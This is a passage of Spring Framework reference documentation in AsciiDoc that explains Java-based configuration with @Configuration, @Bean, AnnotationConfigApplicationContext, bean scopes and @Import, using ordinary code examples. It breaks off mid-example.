[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Configuration
	public class AppConfig {

		@Bean
		public MyService myService() {
			return new MyServiceImpl();
		}

	}
----

The `AppConfig` class above would be equivalent to the following Spring `<beans/>` XML:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<beans>
		<bean id="myService" class="com.acme.services.MyServiceImpl"/>
	</beans>
----

.Full @Configuration vs 'lite' @Beans mode?
****
When `@Bean` methods are declared within classes that are __not__ annotated with
`@Configuration`, they are referred to as being processed in 'lite' mode. For example,
bean methods declared in a `@Component` or even in a __plain old class__ will be
considered 'lite'.

Unlike full `@Configuration`, lite `@Bean` methods cannot easily declare inter-bean
dependencies. Usually one `@Bean` method should not invoke another `@Bean` method when
operating in 'lite' mode.

Using `@Bean` methods only within `@Configuration` classes is the recommended approach
for ensuring that 'full' mode is always used. This will prevent the same `@Bean` method
from accidentally being invoked multiple times and helps to reduce subtle bugs that can
be hard to track down when operating in 'lite' mode.
****

The `@Bean` and `@Configuration` annotations will be discussed in depth in the sections
below. First, however, we'll cover the various ways of creating a Spring container using
Java-based configuration.

[[beans-java-instantiating-container]]
=== Instantiating the Spring container using AnnotationConfigApplicationContext

The sections below document Spring's `AnnotationConfigApplicationContext`, new in Spring
3.0. This versatile `ApplicationContext` implementation is capable of accepting not only
`@Configuration` classes as input, but also plain `@Component` classes and classes
annotated with JSR-330 metadata.

When `@Configuration` classes are provided as input, the `@Configuration` class itself
is registered as a bean definition, and all declared `@Bean` methods within the class
are also registered as bean definitions.

When `@Component` and JSR-330 classes are provided, they are registered as bean
definitions, and it is assumed that DI metadata such as `@Autowired` or `@Inject` are
used within those classes where necessary.


[[beans-java-instantiating-container-contstructor]]
==== Simple construction

In much the same way that Spring XML files are used as input when instantiating a
`ClassPathXmlApplicationContext`, `@Configuration` classes may be used as input when
instantiating an `AnnotationConfigApplicationContext`. This allows for completely
XML-free usage of the Spring container:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public static void main(String[] args) {
		ApplicationContext ctx = new AnnotationConfigApplicationContext(AppConfig.class);
		MyService myService = ctx.getBean(MyService.class);
		myService.doStuff();
	}
----

As mentioned above, `AnnotationConfigApplicationContext` is not limited to working only
with `@Configuration` classes. Any `@Component` or JSR-330 annotated class may be supplied
as input to the constructor.
For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(MyServiceImpl.class, Dependency1.class, Dependency2.class);\n\t\tMyService myService = ctx.getBean(MyService.class);\n\t\tmyService.doStuff();\n\t}\n----\n\nThe above assumes that `MyServiceImpl`, `Dependency1` and `Dependency2` use Spring\ndependency injection annotations such as `@Autowired`.\n\n\n[[beans-java-instantiating-container-register]]\n==== Building the container programmatically using register(Class<?>...)\n\nAn `AnnotationConfigApplicationContext` may be instantiated using a no-arg constructor\nand then configured using the `register()` method. This approach is particularly useful\nwhen programmatically building an `AnnotationConfigApplicationContext`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tAnnotationConfigApplicationContext ctx = new AnnotationConfigApplicationContext();\n\t\tctx.register(AppConfig.class, OtherConfig.class);\n\t\tctx.register(AdditionalConfig.class);\n\t\tctx.refresh();\n\t\tMyService myService = ctx.getBean(MyService.class);\n\t\tmyService.doStuff();\n\t}\n----\n\n\n[[beans-java-instantiating-container-scan]]\n==== Enabling component scanning with scan(String...)\n\nTo enable component scanning, just annotate your `@Configuration` class as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ComponentScan(basePackages = \"com.acme\")\n\tpublic class AppConfig {\n \t...\n\t}\n----\n\n[TIP]\n====\nExperienced Spring users will be familiar with the XML declaration equivalent from\nSpring's `context:` namespace\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:component-scan base-package=\"com.acme\"\/>\n\t<\/beans>\n----\n====\n\n\nIn the example above, the `com.acme` package will be scanned, looking for any\n`@Component`-annotated classes, and those classes will be registered as Spring bean\ndefinitions within the container. `AnnotationConfigApplicationContext` exposes the\n`scan(String...)` method to allow for the same component-scanning functionality:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tAnnotationConfigApplicationContext ctx = new AnnotationConfigApplicationContext();\n\t\tctx.scan(\"com.acme\");\n\t\tctx.refresh();\n\t\tMyService myService = ctx.getBean(MyService.class);\n\t}\n----\n\n[NOTE]\n====\nRemember that `@Configuration` classes are <<beans-meta-annotations,meta-annotated>>\nwith `@Component`, so they are candidates for component-scanning! In the example above,\nassuming that `AppConfig` is declared within the `com.acme` package (or any package\nunderneath), it will be picked up during the call to `scan()`, and upon `refresh()` all\nits `@Bean` methods will be processed and registered as bean definitions within the\ncontainer.\n====\n\n\n[[beans-java-instantiating-container-web]]\n==== Support for web applications with AnnotationConfigWebApplicationContext\n\nA `WebApplicationContext` variant of `AnnotationConfigApplicationContext` is available\nwith `AnnotationConfigWebApplicationContext`. This implementation may be used when\nconfiguring the Spring `ContextLoaderListener` servlet listener, Spring MVC\n`DispatcherServlet`, etc. What follows is a `web.xml` snippet that configures a typical\nSpring MVC web application. 
Note the use of the `contextClass` context-param and\ninit-param:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<web-app>\n\t\t<!-- Configure ContextLoaderListener to use AnnotationConfigWebApplicationContext\n\t\t\tinstead of the default XmlWebApplicationContext -->\n\t\t<context-param>\n\t\t\t<param-name>contextClass<\/param-name>\n\t\t\t<param-value>\n\t\t\t\torg.springframework.web.context.support.AnnotationConfigWebApplicationContext\n\t\t\t<\/param-value>\n\t\t<\/context-param>\n\n\t\t<!-- Configuration locations must consist of one or more comma- or space-delimited\n\t\t\tfully-qualified @Configuration classes. Fully-qualified packages may also be\n\t\t\tspecified for component-scanning -->\n\t\t<context-param>\n\t\t\t<param-name>contextConfigLocation<\/param-name>\n\t\t\t<param-value>com.acme.AppConfig<\/param-value>\n\t\t<\/context-param>\n\n\t\t<!-- Bootstrap the root application context as usual using ContextLoaderListener -->\n\t\t<listener>\n\t\t\t<listener-class>org.springframework.web.context.ContextLoaderListener<\/listener-class>\n\t\t<\/listener>\n\n\t\t<!-- Declare a Spring MVC DispatcherServlet as usual -->\n\t\t<servlet>\n\t\t\t<servlet-name>dispatcher<\/servlet-name>\n\t\t\t<servlet-class>org.springframework.web.servlet.DispatcherServlet<\/servlet-class>\n\t\t\t<!-- Configure DispatcherServlet to use AnnotationConfigWebApplicationContext\n\t\t\t\tinstead of the default XmlWebApplicationContext -->\n\t\t\t<init-param>\n\t\t\t\t<param-name>contextClass<\/param-name>\n\t\t\t\t<param-value>\n\t\t\t\t\torg.springframework.web.context.support.AnnotationConfigWebApplicationContext\n\t\t\t\t<\/param-value>\n\t\t\t<\/init-param>\n\t\t\t<!-- Again, config locations must consist of one or more comma- or space-delimited\n\t\t\t\tand fully-qualified @Configuration classes -->\n\t\t\t<init-param>\n\t\t\t\t<param-name>contextConfigLocation<\/param-name>\n\t\t\t\t<param-value>com.acme.web.MvcConfig<\/param-value>\n\t\t\t<\/init-param>\n\t\t<\/servlet>\n\n\t\t<!-- map all requests for \/app\/* to the dispatcher servlet -->\n\t\t<servlet-mapping>\n\t\t\t<servlet-name>dispatcher<\/servlet-name>\n\t\t\t<url-pattern>\/app\/*<\/url-pattern>\n\t\t<\/servlet-mapping>\n\t<\/web-app>\n----\n\n\n\n[[beans-java-bean-annotation]]\n=== Using the @Bean annotation\n\n`@Bean` is a method-level annotation and a direct analog of the XML `<bean\/>` element.\nThe annotation supports some of the attributes offered by `<bean\/>`, such as:\n<<beans-factory-lifecycle-initializingbean,init-method>>,\n<<beans-factory-lifecycle-disposablebean,destroy-method>>,\n<<beans-factory-autowire,autowiring>> and `name`.\n\nYou can use the `@Bean` annotation in a `@Configuration`-annotated or in a\n`@Component`-annotated class.\n\n\n[[beans-java-declaring-a-bean]]\n==== Declaring a bean\n\nTo declare a bean, simply annotate a method with the `@Bean` annotation. You use this\nmethod to register a bean definition within an `ApplicationContext` of the type\nspecified as the method's return value. By default, the bean name will be the same as\nthe method name. 
The following is a simple example of a `@Bean` method declaration:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new TransferServiceImpl();\n\t\t}\n\n\t}\n----\n\nThe preceding configuration is exactly equivalent to the following Spring XML:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<bean id=\"transferService\" class=\"com.acme.TransferServiceImpl\"\/>\n\t<\/beans>\n----\n\nBoth declarations make a bean named `transferService` available in the\n`ApplicationContext`, bound to an object instance of type `TransferServiceImpl`:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\ntransferService -> com.acme.TransferServiceImpl\n----\n\n\n[[beans-java-dependencies]]\n==== Bean dependencies\n\nA `@Bean`-annotated method can have an arbitrary number of parameters describing the\ndependencies required to build that bean. For instance, if our `TransferService`\nrequires an `AccountRepository`, we can materialize that dependency via a method\nparameter:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\tpublic TransferService transferService(AccountRepository accountRepository) {\n\t\t\treturn new TransferServiceImpl(accountRepository);\n\t\t}\n\n\t}\n----\n\nThe resolution mechanism is pretty much identical to constructor-based dependency\ninjection; see <<beans-constructor-injection,the relevant section>> for more details.\n\n\n[[beans-java-lifecycle-callbacks]]\n==== Receiving lifecycle callbacks\n\nBeans defined with the `@Bean` annotation support the regular lifecycle callbacks\nand can use the `@PostConstruct` and `@PreDestroy` annotations from JSR-250; see\n<<beans-postconstruct-and-predestroy-annotations,JSR-250 annotations>> for further\ndetails.\n\nThe regular Spring <<beans-factory-nature,lifecycle>> callbacks are fully supported as\nwell. If a bean implements `InitializingBean`, `DisposableBean`, or `Lifecycle`, their\nrespective methods are called by the container.\n\nThe standard set of `*Aware` interfaces such as <<beans-beanfactory,BeanFactoryAware>>,\n<<beans-factory-aware,BeanNameAware>>,\n<<context-functionality-messagesource,MessageSourceAware>>,\n<<beans-factory-aware,ApplicationContextAware>>, and so on are also fully supported.\n\nThe `@Bean` annotation supports specifying arbitrary initialization and destruction\ncallback methods, much like Spring XML's `init-method` and `destroy-method` attributes\non the `bean` element:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class Foo {\n\t\tpublic void init() {\n\t\t\t\/\/ initialization logic\n\t\t}\n\t}\n\n\tpublic class Bar {\n\t\tpublic void cleanup() {\n\t\t\t\/\/ destruction logic\n\t\t}\n\t}\n\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean(initMethod = \"init\")\n\t\tpublic Foo foo() {\n\t\t\treturn new Foo();\n\t\t}\n\n\t\t@Bean(destroyMethod = \"cleanup\")\n\t\tpublic Bar bar() {\n\t\t\treturn new Bar();\n\t\t}\n\n\t}\n----\n\n[NOTE]\n====\nBy default, beans defined using Java config that have a public `close` or `shutdown`\nmethod are automatically enlisted with a destruction callback. 
If you have a public\n`close` or `shutdown` method and you do not wish for it to be called when the container\nshuts down, simply add `@Bean(destroyMethod=\"\")` to your bean definition to disable the\ndefault `(inferred)` mode.\n\nYou may want to do that by default for a resource that you acquire via JNDI, as its\nlifecycle is managed outside the application. In particular, make sure to always do it\nfor a `DataSource` as it is known to be problematic on Java EE application servers.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Bean(destroyMethod=\"\")\n\tpublic DataSource dataSource() throws NamingException {\n\t\treturn (DataSource) jndiTemplate.lookup(\"MyDS\");\n\t}\n----\n\nAlso, with `@Bean` methods, you will typically choose to use programmatic JNDI lookups:\neither using Spring's `JndiTemplate`\/`JndiLocatorDelegate` helpers or straight JNDI\n`InitialContext` usage, but not the `JndiObjectFactoryBean` variant which would force\nyou to declare the return type as the `FactoryBean` type instead of the actual target\ntype, making it harder to use for cross-reference calls in other `@Bean` methods that\nintend to refer to the provided resource here.\n====\n\nOf course, in the case of `Foo` above, it would be equally valid to call the `init()`\nmethod directly during construction:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\t\t@Bean\n\t\tpublic Foo foo() {\n\t\t\tFoo foo = new Foo();\n\t\t\tfoo.init();\n\t\t\treturn foo;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[TIP]\n====\nWhen you work directly in Java, you can do anything you like with your objects and do\nnot always need to rely on the container lifecycle!\n====\n\n\n[[beans-java-specifying-bean-scope]]\n==== Specifying bean scope\n\n[[beans-java-available-scopes]]\n===== Using the @Scope annotation\n\nYou can specify that your beans defined with the `@Bean` annotation should have a\nspecific scope. You can use any of the standard scopes specified in the\n<<beans-factory-scopes,Bean Scopes>> section.\n\nThe default scope is `singleton`, but you can override this with the `@Scope` annotation:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class MyConfiguration {\n\n\t\t@Bean\n\t\t**@Scope(\"prototype\")**\n\t\tpublic Encryptor encryptor() {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\n[[beans-java-scoped-proxy]]\n===== @Scope and scoped-proxy\n\nSpring offers a convenient way of working with scoped dependencies through\n<<beans-factory-scopes-other-injection,scoped proxies>>. The easiest way to create such\na proxy when using the XML configuration is the `<aop:scoped-proxy\/>` element.\nConfiguring your beans in Java with the `@Scope` annotation offers equivalent support\nvia the `proxyMode` attribute. 
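For instance, the following sketch declares a session-scoped bean with an explicit\n`proxyMode` (this is what the `@SessionScope` shortcut used below defaults to):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ expose each HTTP Session-scoped instance through a CGLIB class-based proxy\n\t@Bean\n\t@Scope(value = \"session\", proxyMode = ScopedProxyMode.TARGET_CLASS)\n\tpublic UserPreferences userPreferences() {\n\t\treturn new UserPreferences();\n\t}\n----\n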
The default is no proxy (`ScopedProxyMode.NO`), but you can\nspecify `ScopedProxyMode.TARGET_CLASS` or `ScopedProxyMode.INTERFACES`.\n\nIf you port the scoped proxy example from the XML reference documentation (see the preceding\nlink) to Java using `@Bean`, it would look like the following:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ an HTTP Session-scoped bean exposed as a proxy\n\t@Bean\n\t**@SessionScope**\n\tpublic UserPreferences userPreferences() {\n\t\treturn new UserPreferences();\n\t}\n\n\t@Bean\n\tpublic UserService userService() {\n\t\tUserService service = new SimpleUserService();\n\t\t\/\/ a reference to the proxied userPreferences bean\n\t\tservice.setUserPreferences(userPreferences());\n\t\treturn service;\n\t}\n----\n\n\n[[beans-java-customizing-bean-naming]]\n==== Customizing bean naming\n\nBy default, configuration classes use a `@Bean` method's name as the name of the\nresulting bean. This functionality can be overridden, however, with the `name` attribute.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean(name = \"myFoo\")\n\t\tpublic Foo foo() {\n\t\t\treturn new Foo();\n\t\t}\n\n\t}\n----\n\n\n[[beans-java-bean-aliasing]]\n==== Bean aliasing\n\nAs discussed in <<beans-beanname>>, it is sometimes desirable to give a single bean\nmultiple names, otherwise known as __bean aliasing__. The `name` attribute of the `@Bean`\nannotation accepts a String array for this purpose.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean(name = { \"dataSource\", \"subsystemA-dataSource\", \"subsystemB-dataSource\" })\n\t\tpublic DataSource dataSource() {\n\t\t\t\/\/ instantiate, configure and return DataSource bean...\n\t\t}\n\n\t}\n----\n\n\n[[beans-java-bean-description]]\n==== Bean description\n\nSometimes it is helpful to provide a more detailed textual description of a bean. This can\nbe particularly useful when beans are exposed (perhaps via JMX) for monitoring purposes.\n\nTo add a description to a `@Bean`, the\n{api-spring-framework}\/context\/annotation\/Description.html[`@Description`]\nannotation can be used:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\t**@Description(\"Provides a basic example of a bean\")**\n\t\tpublic Foo foo() {\n\t\t\treturn new Foo();\n\t\t}\n\n\t}\n----\n\n\n[[beans-java-configuration-annotation]]\n=== Using the @Configuration annotation\n\n`@Configuration` is a class-level annotation indicating that an object is a source of\nbean definitions. `@Configuration` classes declare beans via public `@Bean`-annotated\nmethods. Calls to `@Bean` methods on `@Configuration` classes can also be used to define\ninter-bean dependencies. 
See <<beans-java-basic-concepts>> for a general introduction.\n\n\n[[beans-java-injecting-dependencies]]\n==== Injecting inter-bean dependencies\n\nWhen ``@Bean``s have dependencies on one another, expressing that dependency is as simple\nas having one bean method call another:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\tpublic Foo foo() {\n\t\t\treturn new Foo(bar());\n\t\t}\n\n\t\t@Bean\n\t\tpublic Bar bar() {\n\t\t\treturn new Bar();\n\t\t}\n\n\t}\n----\n\nIn the example above, the `foo` bean receives a reference to `bar` via constructor\ninjection.\n\n[NOTE]\n====\nThis method of declaring inter-bean dependencies only works when the `@Bean` method is\ndeclared within a `@Configuration` class. You cannot declare inter-bean dependencies\nusing plain `@Component` classes.\n====\n\n\n[[beans-java-method-injection]]\n==== Lookup method injection\n\nAs noted earlier, <<beans-factory-method-injection,lookup method injection>> is an\nadvanced feature that you should use rarely. It is useful in cases where a\nsingleton-scoped bean has a dependency on a prototype-scoped bean. Using Java for this\ntype of configuration provides a natural means for implementing this pattern.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic abstract class CommandManager {\n\t\tpublic Object process(Object commandState) {\n\t\t\t\/\/ grab a new instance of the appropriate Command interface\n\t\t\tCommand command = createCommand();\n\t\t\t\/\/ set the state on the (hopefully brand new) Command instance\n\t\t\tcommand.setState(commandState);\n\t\t\treturn command.execute();\n\t\t}\n\n\t\t\/\/ okay... but where is the implementation of this method?\n\t\tprotected abstract Command createCommand();\n\t}\n----\n\nUsing Java-configuration support, you can create a subclass of `CommandManager` where\nthe abstract `createCommand()` method is overridden in such a way that it looks up a new\n(prototype) command object:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Bean\n\t@Scope(\"prototype\")\n\tpublic AsyncCommand asyncCommand() {\n\t\tAsyncCommand command = new AsyncCommand();\n\t\t\/\/ inject dependencies here as required\n\t\treturn command;\n\t}\n\n\t@Bean\n\tpublic CommandManager commandManager() {\n\t\t\/\/ return new anonymous implementation of CommandManager with createCommand()\n\t\t\/\/ overridden to return a new prototype Command object\n\t\treturn new CommandManager() {\n\t\t\tprotected Command createCommand() {\n\t\t\t\treturn asyncCommand();\n\t\t\t}\n\t\t};\n\t}\n----\n\n\n[[beans-java-further-information-java-config]]\n==== Further information about how Java-based configuration works internally\n\nThe following example shows a `@Bean`-annotated method being called twice:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\tpublic ClientService clientService1() {\n\t\t\tClientServiceImpl clientService = new ClientServiceImpl();\n\t\t\tclientService.setClientDao(clientDao());\n\t\t\treturn clientService;\n\t\t}\n\n\t\t@Bean\n\t\tpublic ClientService clientService2() {\n\t\t\tClientServiceImpl clientService = new ClientServiceImpl();\n\t\t\tclientService.setClientDao(clientDao());\n\t\t\treturn clientService;\n\t\t}\n\n\t\t@Bean\n\t\tpublic ClientDao clientDao() {\n\t\t\treturn new ClientDaoImpl();\n\t\t}\n\n\t}\n----\n\n`clientDao()` has been called once in `clientService1()` and once in `clientService2()`.\nSince this method 
creates a new instance of `ClientDaoImpl` and returns it, you would\nnormally expect to have two instances (one for each service). That would definitely be\nproblematic: in Spring, instantiated beans have a `singleton` scope by default. This is\nwhere the magic comes in: All `@Configuration` classes are subclassed at startup-time\nwith `CGLIB`. In the subclass, the child method checks the container first for any\ncached (scoped) beans before it calls the parent method and creates a new instance. Note\nthat as of Spring 3.2, it is no longer necessary to add CGLIB to your classpath because\nCGLIB classes have been repackaged under `org.springframework.cglib` and included directly\nwithin the spring-core JAR.\n\n[NOTE]\n====\nThe behavior can differ according to the scope of your bean. We are talking\nabout singletons here.\n====\n\n[TIP]\n====\nThere are a few restrictions due to the fact that CGLIB dynamically adds features at\nstartup-time, in particular that configuration classes must not be final. However, as\nof Spring 4.3, any constructors are allowed on configuration classes, including the use of\n`@Autowired` or a single non-default constructor declaration for default injection.\n\nIf you prefer to avoid any CGLIB-imposed limitations, consider declaring your `@Bean`\nmethods on non-`@Configuration` classes, e.g. on plain `@Component` classes instead.\nCross-method calls between `@Bean` methods won't get intercepted then, so you'll have\nto exclusively rely on dependency injection at the constructor or method level there.\n====\n\n\n\n[[beans-java-composing-configuration-classes]]\n=== Composing Java-based configurations\n\n\n[[beans-java-using-import]]\n==== Using the @Import annotation\n\nMuch as the `<import\/>` element is used within Spring XML files to aid in modularizing\nconfigurations, the `@Import` annotation allows for loading `@Bean` definitions from\nanother configuration class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class ConfigA {\n\n\t\t@Bean\n\t\tpublic A a() {\n\t\t\treturn new A();\n\t\t}\n\n\t}\n\n\t@Configuration\n\t@Import(ConfigA.class)\n\tpublic class ConfigB {\n\n\t\t@Bean\n\t\tpublic B b() {\n\t\t\treturn new B();\n\t\t}\n\n\t}\n----\n\nNow, rather than needing to specify both `ConfigA.class` and `ConfigB.class` when\ninstantiating the context, only `ConfigB` needs to be supplied explicitly:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(ConfigB.class);\n\n\t\t\/\/ now both beans A and B will be available...\n\t\tA a = ctx.getBean(A.class);\n\t\tB b = ctx.getBean(B.class);\n\t}\n----\n\nThis approach simplifies container instantiation, as only one class needs to be dealt\nwith, rather than requiring the developer to remember a potentially large number of\n`@Configuration` classes during construction.\n\n[TIP]\n====\nAs of Spring Framework 4.2, `@Import` also supports references to regular component\nclasses, analogous to the `AnnotationConfigApplicationContext.register` method.\nThis is particularly useful if you'd like to avoid component scanning, using a few\nconfiguration classes as entry points for explicitly defining all your components.\n====\n\n[[beans-java-injecting-imported-beans]]\n===== Injecting dependencies on imported @Bean definitions\n\nThe example above works, but is simplistic. 
In most practical scenarios, beans will have\ndependencies on one another across configuration classes. When using XML, this is not an\nissue, per se, because there is no compiler involved, and one can simply declare\n`ref=\"someBean\"` and trust that Spring will work it out during container initialization.\nOf course, when using `@Configuration` classes, the Java compiler places constraints on\nthe configuration model, in that references to other beans must be valid Java syntax.\n\nFortunately, solving this problem is simple. As <<beans-java-dependencies,we already discussed>>,\n`@Bean` methods can have an arbitrary number of parameters describing the bean\ndependencies. Let's consider a more real-world scenario with several `@Configuration`\nclasses, each depending on beans declared in the others:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class ServiceConfig {\n\n\t\t@Bean\n\t\tpublic TransferService transferService(AccountRepository accountRepository) {\n\t\t\treturn new TransferServiceImpl(accountRepository);\n\t\t}\n\n\t}\n\n\t@Configuration\n\tpublic class RepositoryConfig {\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository(DataSource dataSource) {\n\t\t\treturn new JdbcAccountRepository(dataSource);\n\t\t}\n\n\t}\n\n\t@Configuration\n\t@Import({ServiceConfig.class, RepositoryConfig.class})\n\tpublic class SystemTestConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\t\/\/ return new DataSource\n\t\t}\n\n\t}\n\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(SystemTestConfig.class);\n\t\t\/\/ everything wires up across configuration classes...\n\t\tTransferService transferService = ctx.getBean(TransferService.class);\n\t\ttransferService.transfer(100.00, \"A123\", \"C456\");\n\t}\n----\n\nThere is another way to achieve the same result. Remember that `@Configuration` classes are\nultimately just another bean in the container: this means that they can take advantage of\n`@Autowired` and `@Value` injection and so on, just like any other bean!\n\n[WARNING]\n====\nMake sure that the dependencies you inject that way are of the simplest kind only. `@Configuration`\nclasses are processed quite early during the initialization of the context and forcing a dependency\nto be injected this way may lead to unexpected early initialization. Whenever possible, resort to\nparameter-based injection as in the example above.\n\nAlso, be particularly careful with `BeanPostProcessor` and `BeanFactoryPostProcessor` definitions\nvia `@Bean`. Those should usually be declared as `static @Bean` methods, not triggering the\ninstantiation of their containing configuration class. 
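For example, a `BeanFactoryPostProcessor` such as the standard placeholder configurer\nwould typically be declared as follows (a minimal sketch):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Bean\n\tpublic static PropertySourcesPlaceholderConfigurer propertyPlaceholderConfigurer() {\n\t\t\/\/ declared static so that the post-processor can be registered without\n\t\t\/\/ instantiating the enclosing @Configuration class\n\t\treturn new PropertySourcesPlaceholderConfigurer();\n\t}\n----\n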
Otherwise, `@Autowired` and `@Value` won't\nwork on the configuration class itself since it is being created as a bean instance too early.\n====\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class ServiceConfig {\n\n\t\t@Autowired\n\t\tprivate AccountRepository accountRepository;\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new TransferServiceImpl(accountRepository);\n\t\t}\n\n\t}\n\n\t@Configuration\n\tpublic class RepositoryConfig {\n\n\t\tprivate final DataSource dataSource;\n\n\t\t@Autowired\n\t\tpublic RepositoryConfig(DataSource dataSource) {\n\t\t\tthis.dataSource = dataSource;\n\t\t}\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository() {\n\t\t\treturn new JdbcAccountRepository(dataSource);\n\t\t}\n\n\t}\n\n\t@Configuration\n\t@Import({ServiceConfig.class, RepositoryConfig.class})\n\tpublic class SystemTestConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\t\/\/ return new DataSource\n\t\t}\n\n\t}\n\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(SystemTestConfig.class);\n\t\t\/\/ everything wires up across configuration classes...\n\t\tTransferService transferService = ctx.getBean(TransferService.class);\n\t\ttransferService.transfer(100.00, \"A123\", \"C456\");\n\t}\n----\n\n[TIP]\n====\nConstructor injection in `@Configuration` classes is only supported as of Spring\nFramework 4.3. Note also that there is no need to specify `@Autowired` if the target\nbean defines only one constructor; in the example above, `@Autowired` is not necessary\non the `RepositoryConfig` constructor.\n====\n\n.[[beans-java-injecting-imported-beans-fq]]Fully-qualifying imported beans for ease of navigation\n--\nIn the scenario above, using `@Autowired` works well and provides the desired\nmodularity, but determining exactly where the autowired bean definitions are declared is\nstill somewhat ambiguous. For example, as a developer looking at `ServiceConfig`, how do\nyou know exactly where the `@Autowired AccountRepository` bean is declared? It's not\nexplicit in the code, and this may be just fine. Remember that the\nhttps:\/\/spring.io\/tools\/sts[Spring Tool Suite] provides tooling that\ncan render graphs showing how everything is wired up - that may be all you need. Also,\nyour Java IDE can easily find all declarations and uses of the `AccountRepository` type,\nand will quickly show you the location of `@Bean` methods that return that type.\n\nIn cases where this ambiguity is not acceptable and you wish to have direct navigation\nfrom within your IDE from one `@Configuration` class to another, consider autowiring the\nconfiguration classes themselves:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class ServiceConfig {\n\n\t\t@Autowired\n\t\tprivate RepositoryConfig repositoryConfig;\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\t\/\/ navigate 'through' the config class to the @Bean method!\n\t\t\treturn new TransferServiceImpl(repositoryConfig.accountRepository());\n\t\t}\n\n\t}\n----\n\nIn the situation above, it is completely explicit where `AccountRepository` is defined.\nHowever, `ServiceConfig` is now tightly coupled to `RepositoryConfig`; that's the\ntradeoff. This tight coupling can be somewhat mitigated by using interface-based or\nabstract class-based `@Configuration` classes. 
Consider the following:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class ServiceConfig {\n\n\t\t@Autowired\n\t\tprivate RepositoryConfig repositoryConfig;\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new TransferServiceImpl(repositoryConfig.accountRepository());\n\t\t}\n\t}\n\n\t@Configuration\n\tpublic interface RepositoryConfig {\n\n\t\t@Bean\n\t\tAccountRepository accountRepository();\n\n\t}\n\n\t@Configuration\n\tpublic class DefaultRepositoryConfig implements RepositoryConfig {\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository() {\n\t\t\treturn new JdbcAccountRepository(...);\n\t\t}\n\n\t}\n\n\t@Configuration\n\t@Import({ServiceConfig.class, DefaultRepositoryConfig.class}) \/\/ import the concrete config!\n\tpublic class SystemTestConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\t\/\/ return DataSource\n\t\t}\n\n\t}\n\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(SystemTestConfig.class);\n\t\tTransferService transferService = 